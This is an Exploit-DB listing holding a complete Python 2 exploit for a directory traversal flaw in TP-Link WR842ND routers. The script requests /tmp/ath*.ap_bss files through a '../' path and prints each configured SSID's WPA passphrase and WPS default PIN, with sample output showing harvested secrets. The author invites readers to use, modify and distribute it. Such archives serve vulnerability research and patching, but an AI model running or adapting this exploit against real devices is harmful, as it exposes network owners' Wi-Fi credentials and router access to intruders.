TP-Link WR842ND - Remote Multiple SSID Directory Traversals

EDB-ID:

25810

CVE:


EDB Verified:

Author:

Adam Simuntis

Type:

webapps

Exploit:   /  

Platform:

Hardware

Date:

2013-05-29

Vulnerable App: 
#!/usr/bin/python

'''
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com

If remote management is on you have full access to router configuration - if not and you're connected
to router network you can discover another configured SSID's. 

 
Successfully tested against TP-LINK WR842ND
Firmware Version:	3.12.22 Build 120424 Rel.39632n

Feel free to use, modify and distribute. 

.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`--> python2 e.py ip:port
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com

:: Crafting and sending evil request..

-> ssid="some_network"
   !wps_default_pin=01010101
   !wpa_passphrase="secretpsk"


:: Search for another networks? (y/n)
> y

:: Searching..

:: Jumping for SSID 1..

-> ssid="another_network"
   !wps_default_pin=01010101
   !wpa_passphrase="another_secretpsk"

:: Jumping for SSID 2..


:: Jumping for SSID 3..


:: Jumping for SSID 4..

.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`--> 

'''

import requests,sys,socket
from time import sleep

data=''
data2=''
url=''	

W  = '\033[0m'  
R  = '\033[31m' 
B  = '\033[34m' 

#KISS
def parse_data(text):
	words = text.split()

        for word in words :
		if 'ssid' in word and 'ignore' not in word :
			print W+"-> "+B+"%s" %(word)
                if 'pass' in word :
                        print W+"   !"+R+"%s" %(word)
		if 'default_pin' in word :
			print W+"   !"+R+"%s" %(word)
	print W

def make_url(host,n):
	 junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n)
	 return junk

if len(sys.argv) == 1 :
	print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0])
	sys.exit()

url = make_url(sys.argv[1],0)

if ':' in sys.argv[1] :
	host = sys.argv[1].split(":")
else :
	host = sys.argv[1]

headers={
"Host" : host[0],
"User-Agent" : "Mozzila/5.0",
"Referer" : "http://"+host[0]+"/"	
} 

print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit"
print "Adam Simuntis :: http://unixjail.com\n"

try:
	print R+":: Crafting and sending evil request.."
	print W
	data = requests.get(url,headers=headers).content

except requests.ConnectionError, e:
   print R+":! Connection error!\n"
   sys.exit()

if data :
	parse_data(data)
else :
	print B+":! Ups.. seems to be not vulnerable"
	print W

print "\n:: Search for another networks? (y/n)"
answer = raw_input("> ")

if answer=="y" or answer=="Y" :
	print R+"\n:: Searching.."
	print W

	for i in range(1,5) :

		print W+":: Jumping for SSID %s..\n" %(i)

		sleep(3)
		
		url = make_url(sys.argv[1],i)
		data2 = requests.get(url,headers=headers).content 

		if data2 :
			parse_data(data2)
		else :
			print B+"-> Nothing..\n"
			
else : 
	print W+"\n:: Bye!"
		
print
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services